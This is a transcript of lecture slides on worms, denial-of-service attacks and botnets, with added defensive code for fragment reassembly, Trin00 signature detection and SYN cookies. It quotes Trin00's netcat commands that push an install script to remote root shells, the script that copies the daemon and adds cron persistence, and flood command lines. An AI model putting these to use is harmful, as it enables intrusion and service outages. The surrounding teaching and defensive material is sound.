
Worms, DDOS, and Botnets



Presentation Transcript


  1. Worms, DDOS, and Botnets Wide-spread Internet attacks

  2. Worms • Active network propagation • Replicates (like a virus) • Operates independently of users • Compromises remote machines through insecure network services • Copies itself to each machine it compromises

  3. Morris Worm • Released on Nov 2, 1988 • Morris was a Cornell Ph.D. student • Objective • A program to “live” in the Internet • Steps • Determine where to spread • Spread its infection • Remain undiscovered and undiscoverable

  4. Morris Worm • Where to spread • netstat -r -n (the routing table) • /etc/hosts • Yellow Pages (NIS) distributed hosts file • Tries all the local addresses found in these sources

  5. Morris Worm • Security flaws to exploit • Weak passwords, guessed and then used over rsh/rexec • Buffer overflow in the fingerd program (gets() into a fixed 512-byte buffer) • Trapdoor in the sendmail mail handler • DEBUG mode let a remote sender run commands

  6. Morris Worm • Disguise • Remove all the traces from disks • Save all files in memory, encrypted • Change its process name periodically • Oops • sendmail log files • Monitoring • 1/15 chance it sends a byte to a server at Berkeley

  7. Morris Worm • Effects • Resource exhaustion, disconnection, isolation • $10-100M damage • Bug in the worm: its reinfection check failed often enough that machines ran many copies, which is what made it noticeable • Robert T. Morris • Tried and convicted of violating the 1986 Computer Fraud and Abuse Act • First conviction under that Act • 3 years probation • 400 hours of community service • $10,050 fine

  8. Code Red • Appeared in the middle of 2001 • On July 19, it infected more than 250,000 systems in nine hours • Infection • Buffer overflow in Microsoft's Internet Information Server (the Index Server ISAPI extension) • Propagation • Probes random IP addresses on TCP port 80 to see whether a vulnerable web server answers

  9. Denial of Service • Loss of "availability" • Regular use is stopped • DoS as a stepping stone (a downgrade attack) • Version 1 of a protocol is insecure • Version 2 is secure, but backwards compatible with version 1 • DoS the version 2 service • Clients fall back to version 1 • Attack those clients through version 1's weaknesses

  10. Old Attacks • Error handling • Failures in handling malformed packets crashed the whole system • Ping of Death • Fragmented ICMP echo whose pieces reassemble to more than the 65,535-byte IP maximum • Teardrop • Manipulate the offset in fragmented packets • Land Attack • Same source and destination IP and port

  11. Old Attacks • Looping • Smurf attack • Ping to a broadcast address with the victim's address as source • echo/chargen • Echo (UDP port 7) is a service that repeats what you send • Chargen (UDP port 19) is a service that generates characters • A single spoofed UDP packet, apparently from the victim's Echo port, is sent to another machine's Chargen service • Chargen answers Echo, Echo answers Chargen, and the two loop forever • Boom!

  12. DoS Attacks • General security principle • Robustness to normal inputs ≠ Robustness to attacks

  13. LAND Attack (diagram) • A single TCP SYN whose source and destination are the same host and port: Source IP 129.107.94.136, Source Port 22; Dest. IP 129.107.94.136, Dest. Port 22 • Vulnerable stacks of the time answered the SYN with a SYN/ACK to themselves and locked up

  14. Teardrop Attack • IP fragmentation • Fragment offset: each fragment says, in 8-byte units, where its data belongs in the reassembled datagram • NFB: amount of data in the first fragment • Normal case (diagram): Packet 1: More fragments = 1, Frag. offset = 0; Packet 2: Frag. offset = 0 + NFB, i.e. it starts exactly where packet 1 ended

  15. Teardrop Attack • Attack • Simply a bad offset (diagram): Packet 1: More fragments = 1, Frag. offset = 0; Packet 2: Frag. offset = 2354692110 • The second fragment's offset does not line up with the end of the first • The real Teardrop tool used an overlapping offset (too small rather than too large): the kernel trimmed the overlap by moving the offset forward, computed a negative copy length, and the unsigned memcpy crashed the machine
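The fragment checks behind the two attacks above, as an added example that is not part of the slides: it builds fragments with the real IPv4 header layout, then reassembles them the way a hardened stack should, refusing a reassembled size over 65,535 bytes (Ping of Death) and any fragment whose offset does not line up with the previous one (Teardrop). naive_copy_length models the arithmetic the original Teardrop abused. The 10.0.0.x addresses, IP IDs and payloads are made up for the demo.

```python
"""Defensive IPv4 fragment reassembly (Ping of Death and Teardrop checks)."""
import struct

IP_MAX_LEN = 65535          # IPv4 total length is a 16-bit field
MF_FLAG = 0x2000            # "more fragments" bit in the flags/offset word
OFFSET_MASK = 0x1FFF        # 13-bit fragment offset, in 8-byte units
HDR_FMT = "!BBHHHBBH4s4s"   # 20-byte IPv4 header, no options


class ReassemblyError(ValueError):
    """Raised instead of trusting a malformed fragment sequence."""


def _ip_bytes(dotted):
    return bytes(int(x) for x in dotted.split("."))


def build_fragment(ident, offset, more, payload, proto=1,
                   src="10.0.0.1", dst="10.0.0.2"):
    """Return one raw IPv4 fragment. offset is in bytes and a multiple of 8."""
    if offset % 8 or offset // 8 > OFFSET_MASK:
        raise ValueError("offset must be a multiple of 8 and at most 65528")
    flags_off = (MF_FLAG if more else 0) | (offset // 8)
    hdr = struct.pack(HDR_FMT, 0x45, 0, 20 + len(payload), ident, flags_off,
                      64, proto, 0, _ip_bytes(src), _ip_bytes(dst))
    return hdr + payload


def parse_fragment(pkt):
    """Return (datagram key, byte offset, more-fragments flag, payload)."""
    (vihl, _tos, total, ident, flags_off, _ttl,
     proto, _csum, src, dst) = struct.unpack(HDR_FMT, pkt[:20])
    ihl = (vihl & 0x0F) * 4
    if vihl >> 4 != 4 or ihl < 20 or total > len(pkt):
        raise ReassemblyError("bad IPv4 header")
    key = (ident, src, dst, proto)
    return key, (flags_off & OFFSET_MASK) * 8, bool(flags_off & MF_FLAG), pkt[ihl:total]


def reassemble(packets):
    """Reassemble one datagram, validating every offset before copying.

    Fragments may arrive in any order. Raises ReassemblyError on an overlap,
    a hole, an oversize result or an inconsistent more-fragments flag.
    """
    frags, key = [], None
    for pkt in packets:
        k, offset, more, payload = parse_fragment(pkt)
        if key is None:
            key = k
        elif k != key:
            raise ReassemblyError("fragment belongs to a different datagram")
        frags.append((offset, more, payload))
    frags.sort(key=lambda f: f[0])

    out, next_offset = bytearray(), 0
    for i, (offset, more, payload) in enumerate(frags):
        end = offset + len(payload)
        if end > IP_MAX_LEN:
            # Ping of Death: each fragment is legal on the wire, the whole is not
            raise ReassemblyError(f"reassembled length {end} exceeds {IP_MAX_LEN}")
        if offset != next_offset:
            # Teardrop: offset < next_offset is an overlap, > is a hole
            raise ReassemblyError(f"fragment at {offset} does not abut {next_offset}")
        if more == (i == len(frags) - 1):
            raise ReassemblyError("more-fragments flag inconsistent with position")
        if more and len(payload) % 8:
            raise ReassemblyError("non-final fragment is not a multiple of 8 bytes")
        out += payload
        next_offset = end
    return bytes(out)


def naive_copy_length(prev_end, offset, length):
    """Model the C arithmetic Teardrop abused (32-bit unsigned wrap-around).

    A trusting reassembler trims an overlapping fragment by moving its offset
    up to the previous fragment's end, then copies (end - offset) bytes. If the
    fragment also ends before that previous end, the difference is negative.
    """
    end = offset + length
    if offset < prev_end:
        offset = prev_end
    return (end - offset) & 0xFFFFFFFF


# Constructed demo inputs (IP IDs and payloads are arbitrary)
GOOD = [build_fragment(1, 0, True, b"A" * 16), build_fragment(1, 16, False, b"B" * 8)]
TEARDROP = [build_fragment(2, 0, True, b"A" * 32), build_fragment(2, 24, False, b"B" * 4)]
PING_OF_DEATH = [build_fragment(3, 0, True, b"A" * 8),
                 build_fragment(3, 65528, False, b"B" * 16)]   # would end at 65544

if __name__ == "__main__":
    print("good:", reassemble(GOOD))
    for name, frags in (("teardrop", TEARDROP), ("ping of death", PING_OF_DEATH)):
        try:
            reassemble(frags)
        except ReassemblyError as err:
            print(f"{name}: rejected ({err})")
    print("naive copy length for the teardrop pair:", naive_copy_length(32, 24, 4))
```

Running it prints the good datagram and the two rejections. The order matters: validate first, then copy. A stack that trims the overlap first and sizes the copy afterwards is exactly the one Teardrop broke, and naive_copy_length shows the 4-byte fragment turning into a 4 GB copy.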

  16. Smurf Attack • ICMP echo (ping) as the lever • Leverage 129.16.33.* (diagram): the attacker sends one ICMP echo request to the broadcast address 129.16.33.255 with the source IP forged to the victim, 129.107.94.136 • Every host on 129.16.33.* that answers sends its echo reply to 129.107.94.136, so one spoofed ping becomes a subnet's worth of replies at the victim

  17. Network DoS • ARP attacks • Spoof ARP replies so the router's IP address is advertised with any other Ethernet address; every host that caches the bogus entry loses its route off the subnet.

  18. Lessons Learned? • Many equivalent attacks today • Look at CERT alerts • Many are DOS vulnerabilities • Usually software errors • We’re still bad at handling malformed inputs • Unnecessary services • Many have been taken away (generally) • More keep popping up

  19. Flooding • A Classic Attack • Just send traffic: mail bombs, SYN floods, ICMP • Generally works • If you block the bad traffic at the target, the attacker floods the blocker's link instead • So the block has to happen at least one hop upstream

  20. The Attacker’s Problems • Easily Detectable • IP spoofing? • Works less and less (egress filters) • Partial traceback available • Weak • Amazon.com • Built to handle lots of traffic • One flooder is a blip on the radar

  21. BotNets • Zombies • Many available networked computers • High-speed Internet connections • Automated attacks • No intense firewall hacking • or other dangerous, difficult tasks • Software and OS are homogeneous • Sizes seen: 10,000 to 1.5 million zombies

  22. Anatomy of a Zombie • What would you put into a bot? • Infect and spread • Covert • Make money

  23. Anatomy of a Zombie • An Example (from GRC.com, 2001) • rundIl.exe (note the capital 'eye' in place of the second 'l': in the font the Windows registry editor uses it reads as rundll.exe) • Connection • E.g. an IRC server • Join a secret, password-protected channel • Wait for instructions • Download a trojan • Attack on command • with or without the trojan

  24. Anatomy of UNIX Zombies • Linux/Solaris • Many root kits and network sniffers available • Automatically • Scan for vulnerable services • Attempt attacks • A successful attack leaves a root shell listening on a port, marking the machine as "owned" • (e.g., port 1524, the "ingreslock" service) • Alternatively, the exploit mails the result to a freemail account • Install attackware on these machines

  25. Sample Connections: Trin00 • This script uses "netcat" ("nc") to pipe a shell script to the root shell listening on, in this case, port 1524/tcp:
------------------------------------------------------------------------
./trin.sh | nc 128.aaa.167.217 1524 &
./trin.sh | nc 128.aaa.167.218 1524 &
./trin.sh | nc 128.aaa.167.219 1524 &
./trin.sh | nc 128.aaa.187.38 1524 &
./trin.sh | nc 128.bbb.2.80 1524 &
./trin.sh | nc 128.bbb.2.81 1524 &
./trin.sh | nc 128.bbb.2.238 1524 &
./trin.sh | nc 128.ccc.12.22 1524 &
./trin.sh | nc 128.ccc.12.50 1524 &
. . .
------------------------------------------------------------------------

  26. Sample Script • The script "trin.sh", whose output is being piped to these systems, looks like:
------------------------------------------------------------------------
# Remote-copy the "leaf" daemon to an unsuspicious location
echo "rcp 192.168.0.1:leaf /usr/sbin/rpc.listen"
# Make it executable
echo "chmod +x /usr/sbin/rpc.listen"
echo "echo launching trinoo"
# Run "leaf"
echo "/usr/sbin/rpc.listen"
# Set it up as a cron job that restarts it every minute
echo "echo \* \* \* \* \* /usr/sbin/rpc.listen > cron"
echo "crontab cron"
echo "echo launched"
echo "exit"
------------------------------------------------------------------------

  27. Attack Topology (diagram) • Three tiers: Attackers → Masters → Daemons • Attackers (handles in the diagram): sCUdATK, ^^hATEr^^ • Masters (compromised servers): dns1.uta.edu, www3.security.com, mail.company.com • Daemons: the zombie machines that actually send the flood

  28. Attack Topology • Master's Characteristics • Easy to hide on • lots of accounts • lots of traffic • Should use a r00t kit to hide your tracks • Placed on important systems • Sys admin reluctant to take them down • DNS server, mail server, etc.

  29. New Topologies • Trin00's fixed master/daemon layout is the baseline; later designs remove the master as the single point to catch • IRC: bots take orders in a channel, no master host to seize • Conficker • Rotating Web sites (domain names generated daily) • Storm • Structured P2P

  30. Other Uses of Botnets • Spam • Ad revenue • Phishing & ID theft • Spreading malware • Sell • Compromise machines for others’ use

  31. Script Kiddies • Non-expert Attackers • Trin00 and other DDOS attack tools have well-defined signatures • Fixed port numbers • Fixed & clear-text passwords • Known commands • Crontab entries • File locations • Sys Admins can find these • Experts can avoid them
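A host-side sweep for those signatures, as an added example not from the slides: it runs over constructed `crontab -l`, `netstat -an` and process-list text and flags the Trin00 indicators the slides name (the 1524/tcp root shell, the /usr/sbin/rpc.listen drop path, the every-minute cron entry) plus the look-alike process-name trick from slide 23. The sample output is made up; the indicator values come from the slides.

```python
"""Host sweep for the fixed signatures packaged DDoS agents leave behind."""

# Indicators taken from the slides; a real sweep would load a larger list.
KNOWN_PORTS = {1524: "Trin00 daemon root shell (ingreslock)"}
KNOWN_PATHS = {"/usr/sbin/rpc.listen": "Trin00 'leaf' binary posing as an RPC service"}
# Look-alike characters a lazy disguise swaps in, folded to one canonical form
# (the slide's rundIl.exe uses a capital I for the second l).
CONFUSABLES = str.maketrans({"I": "l", "1": "l", "0": "o", "O": "o"})
LEGIT_PROCESSES = {"rundll.exe", "rundll32.exe", "explorer.exe", "svchost.exe"}


def check_crontab(text):
    """Flag every-minute entries and commands at known drop paths (crontab -l output)."""
    hits = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 5)
        if len(fields) < 6:
            continue
        schedule, command = fields[:5], fields[5]
        if schedule == ["*"] * 5:
            hits.append(f"cron: runs every minute: {command}")
        for path, why in KNOWN_PATHS.items():
            if path in command:
                hits.append(f"cron: {why}: {command}")
    return hits


def check_listeners(text):
    """Flag TCP listeners on ports tied to known tools (Linux netstat -an layout)."""
    hits = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 6 or parts[0] != "tcp" or parts[-1] != "LISTEN":
            continue
        port = int(parts[3].rsplit(":", 1)[1])
        if port in KNOWN_PORTS:
            hits.append(f"listener: {port}/tcp: {KNOWN_PORTS[port]}")
    return hits


def canonical(name):
    """Fold look-alike characters, then lower-case."""
    return name.translate(CONFUSABLES).lower()


def check_process_names(names):
    """Flag names that only match a legitimate binary once look-alikes are folded."""
    hits = []
    for name in names:
        if name.lower() in LEGIT_PROCESSES:
            continue
        folded = canonical(name)
        if folded in LEGIT_PROCESSES:
            hits.append(f"process: {name!r} impersonates {folded!r}")
    return hits


def sweep(crontab_text, netstat_text, process_names):
    return (check_crontab(crontab_text) + check_listeners(netstat_text)
            + check_process_names(process_names))


# Constructed sample output (not from a real host)
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
* * * * * /usr/sbin/rpc.listen
"""
SAMPLE_NETSTAT = """\
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:1524            0.0.0.0:*               LISTEN
tcp        0      0 10.0.0.5:22             10.0.0.9:51514          ESTABLISHED
"""
SAMPLE_PROCESSES = ["explorer.exe", "RUNDLL32.EXE", "rundIl.exe", "svch0st.exe"]

if __name__ == "__main__":
    for hit in sweep(SAMPLE_CRONTAB, SAMPLE_NETSTAT, SAMPLE_PROCESSES):
        print(hit)
```

The point of the slide holds in the code: every check here keys on something the tool author fixed (port, path, schedule, spelling). An operator who renames the binary, picks another port and randomizes the cron schedule walks past all of it, which is why such signatures catch script kiddies and not experts.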

  32. Distributed DoS = DDoS • Step 1 • Get as large a botnet as you can • Step 2 • Flood the target full blast from every zombie • IP spoofing? • Yes: harder to trace back • No: spoofed packets may be dropped by egress filters • No: you didn't hack the boxes directly, so the zombies' real addresses are already hard to trace back to you

  33. Methods of Blasting 1 • Brute Force • Send 10K large pings:
ping.exe 127.10.10.1 -l 65500 -n 10000
• A simple UDP flooder (target, packet size, delay): sends huge packets with no delay, so each one goes out as 1500-byte fragments:
udp 127.10.10.1 9999999 0
• Characteristics • These can be run on the Windows cmd line • Pure brute-force bandwidth consumption

  34. Real World DDoS • Packet trace at the victim (one line per packet):
0.224610 119.226.89.96 -> victim TCP 33081 > 60785 [SYN] Seq=3693150756 Ack=0 Win=32768 Len=0
0.224610 victim -> 223.144.66.65 TCP 52284 > 19586 [RST, ACK] Seq=0 Ack=423694111 Win=0 Len=0
0.224610 3.41.60.116 -> victim TCP 5594 > 40940 [SYN] Seq=2132997225 Ack=0 Win=32768 Len=0
0.224610 victim -> 50.180.94.71 TCP 33289 > 11952 [RST, ACK] Seq=0 Ack=1790973261 Win=0 Len=0
0.224610 244.214.39.108 -> victim TCP 38802 > 23759 [SYN] Seq=747020069 Ack=0 Win=32768 Len=0
0.224610 victim -> 198.183.172.81 TCP 57223 > 43146 [RST, ACK] Seq=0 Ack=3749566807 Win=0 Len=0
0.224610 64.81.138.119 -> victim UDP Source port: 1026 Destination port: 24661
0.224610 victim -> 96.247.9.94 TCP 48931 > 50749 [RST, ACK] Seq=0 Ack=1188357973 Win=0 Len=0
0.224610 103.227.64.42 -> victim TCP 45715 > 63366 [] Seq=3389528594 Ack=0 Win=16384 Len=0
0.224610 victim -> 211.107.218.23 TCP 12666 > 48183 [RST, ACK] Seq=0 Ack=2803931407 Win=0 Len=0
0.224610 87.29.46.64 -> victim TCP 17092 > 47365 [SYN] Seq=3446572548 Ack=0 Win=32768 Len=0
0.224610 victim -> 58.24.148.57 TCP 26667 > 9797 [RST, ACK] Seq=0 Ack=3710546447 Win=0 Len=0
0.224610 8.116.40.43 -> victim TCP 38367 > 32889 [SYN] Seq=1914703987 Ack=0 Win=32768 Len=0
0.225448 victim -> 68.132.173.125 TCP 64470 > 35524 [RST, ACK] Seq=0 Ack=1819819023 Win=0 Len=0
0.225448 75.115.186.26 -> victim TCP 4082 > 29772 [SYN] Seq=4245878839 Ack=0 Win=32768 Len=0
• Every inbound source address is different, the ports are random, and the victim's RST/ACKs go to addresses that never sent anything: the sources are forged.

  35. Methods of Blasting 2 • TCP 3-way handshake (diagram) • Server starts in state LISTEN • Client → Server: SYN=1, seq=963 • Server → Client: SYN=1, seq=382, ack=964; server state SYN_RCVD • Client → Server: SYN=0, seq=964, ack=383; server state ESTABLISHED

  36. Methods of Blasting 2 • TCP 3-way handshake under a SYN flood (diagram) • Server starts in LISTEN • The attacker sends SYN=1, seq=963 again and again (five copies in the diagram) • The server answers each with SYN=1, seq=382, ack=964 and holds a separate SYN_RCVD entry for each • The third message never arrives, so every entry stays half-open

  37. Methods of Blasting 2 • SYN Flood • Open a TCP connection (SYN) • Don't respond to the SYN/ACK • Repeat! • Server • Enters the SYN_RCVD state for each SYN • Limited # of half-open connections allowed (the backlog) • Legit users can't connect • Fix 1: allow more connections • Attack on Fix 1: just send more; every extra entry costs the server memory, processing, and bandwidth

  38. Methods of Blasting 2 • Advantages • Less cost than brute force • Can look the same as legit traffic • Disadvantage • SYN/ACK traffic comes back to the attacker • Unless the source IP is spoofed • But it is far less than what was sent, on average
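Added example, not from the slides: a stateless alternative to "Fix 1", the SYN cookie, as real stacks use it. The server encodes what it would have stored per half-open connection into its own initial sequence number, keyed with a secret, and only allocates state when the final ACK returns a cookie that verifies. Next to it is the slide-37 design with a fixed backlog, so the same spoofed flood can be run against both. Addresses, ports, the secret and the 64-second epoch are demo choices (Linux also uses 64 s); real cookies also squeeze the negotiated MSS into the low bits, which is omitted here.

```python
"""Stateless SYN handling (SYN cookies) versus the backlog design of slide 37."""
import hashlib
import hmac
import os

COOKIE_PERIOD = 64              # seconds per cookie epoch (Linux also uses 64)
DEMO_SECRET = os.urandom(16)    # a real stack rotates this; fixed for the demo


def _mac(secret, src, sport, dst, dport, client_isn, epoch):
    msg = f"{src}:{sport}>{dst}:{dport}|{client_isn}|{epoch}".encode()
    return int.from_bytes(hmac.new(secret, msg, hashlib.sha256).digest()[:3], "big")


def make_cookie(secret, src, sport, dst, dport, client_isn, now):
    """Server ISN for the SYN/ACK: top 8 bits hold the epoch, low 24 a keyed MAC."""
    epoch = int(now // COOKIE_PERIOD) & 0xFF
    return (epoch << 24) | _mac(secret, src, sport, dst, dport, client_isn, epoch)


def check_cookie(secret, src, sport, dst, dport, client_isn, cookie, now, max_age=1):
    """True if we minted `cookie` for this 4-tuple and client ISN within max_age epochs."""
    epoch = cookie >> 24
    current = int(now // COOKIE_PERIOD) & 0xFF
    if (current - epoch) & 0xFF > max_age:
        return False
    expected = _mac(secret, src, sport, dst, dport, client_isn, epoch)
    return hmac.compare_digest(expected.to_bytes(3, "big"),
                               (cookie & 0xFFFFFF).to_bytes(3, "big"))


class StatefulServer:
    """Slide-37 design: one half-open entry per SYN, fixed backlog."""

    def __init__(self, backlog=128):
        self.backlog, self.half_open, self.established = backlog, {}, set()

    def on_syn(self, src, sport, client_isn, now):
        if len(self.half_open) >= self.backlog:
            return None                       # backlog full: SYN dropped
        server_isn = int.from_bytes(os.urandom(4), "big")
        self.half_open[(src, sport)] = server_isn
        return server_isn                     # goes out in the SYN/ACK

    def on_ack(self, src, sport, client_seq, ack, now):
        server_isn = self.half_open.pop((src, sport), None)
        if server_isn is None or ack != server_isn + 1:
            return False
        self.established.add((src, sport))
        return True


class SynCookieServer:
    """Stores nothing per SYN; allocates only when the ACK returns a valid cookie."""

    def __init__(self, secret, addr=("10.0.0.2", 80)):
        self.secret, self.addr, self.established = secret, addr, set()

    def on_syn(self, src, sport, client_isn, now):
        return make_cookie(self.secret, src, sport, *self.addr, client_isn, now)

    def on_ack(self, src, sport, client_seq, ack, now):
        # Final ACK of the handshake: seq = client ISN + 1, ack = our ISN (cookie) + 1
        if not check_cookie(self.secret, src, sport, *self.addr, client_seq - 1, ack - 1, now):
            return False
        self.established.add((src, sport))
        return True


def demo(n_flood=10_000, now=1_000_000.0):
    """Flood both servers with spoofed SYNs, then see whether a real client gets in."""
    results = {}
    for name, srv in (("stateful", StatefulServer()), ("syn_cookie", SynCookieServer(DEMO_SECRET))):
        for i in range(n_flood):           # spoofed sources never send the final ACK
            srv.on_syn(f"203.0.113.{i % 256}", 1024 + i % 60000, i * 7919, now)
        client_isn = 963                   # the slides' example ISN
        server_isn = srv.on_syn("192.0.2.10", 40000, client_isn, now + 0.1)
        results[name] = server_isn is not None and srv.on_ack(
            "192.0.2.10", 40000, client_isn + 1, server_isn + 1, now + 0.2)
    return results


if __name__ == "__main__":
    print(demo())
```

demo() returns {'stateful': False, 'syn_cookie': True}: the backlog server has dropped the real client's SYN, while the cookie server, having stored nothing for the 10,000 forged SYNs, completes the handshake. The cost moves from memory to one HMAC per SYN and per ACK, which is why the slide's "attack on Fix 1" no longer applies; the attacker is left with plain bandwidth exhaustion.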

  39. Making $$DDoS$$ Pay • No big targets • Publicity is good marketing but bad for avoiding arrest • Easier to take small targets down • Advertise • Company B would pay to have Company A's website go down • Extortion: pay us or else

  40. Defenses • Filtering - how • SYN floods: check for repeated source IPs • Floods often aim at non-production ports, which can be dropped outright • Only allow specific forms of UDP • Expensive • $12K/Mo. • Network response time can grow by several seconds • Or pay the extortion fees

  41. Detecting DoS Attacks • Not immediate • Network failure • Slashdot effect • Easy to hide • Use spoofed IP packets and reflection • How do we find these attackers?

  42. Mafiaboy • 2000: Amazon, Dell, eBay • http://www.ecommercetimes.com/perl/story/3044.html “The teen hacker apparently made himself easy to find. He reportedly used an ISP that tracked his activities and made boastful claims -- including information only the hacker would know -- in Internet chat rooms.” • http://www.zdnet.com/zdnn/stories/news/0,4586,2552467,00.html But in what could be a warning to Web sites, authorities said the hacker was not especially skilled technically, yet he was able to cripple a handful of prominent Web sites. “He had a good knowledge of computers, but he was not what we would call a genius” said Staff Sergeant Jean-Pierre Roy of the Royal Canadian Mounted Police (RCMP) during a news conference Wednesday.

  43. Trapdoors • Examples • Special account that bypasses the password check • Special input sequence that bypasses access control • Causes of trapdoors • Forgotten • Intentionally left in the program for testing • Intentionally left for maintenance • Intentionally left as a covert means of access to the component

  44. Rootkits and Backdoors • Backdoor: an open passage into a system • Ex: A root shell listening on a high port • Usually, it is disguised in some fashion. • Rootkit: a complete backdoor system • used to hide one or more backdoors • modify system logs, binaries, etc., to hide its presence.
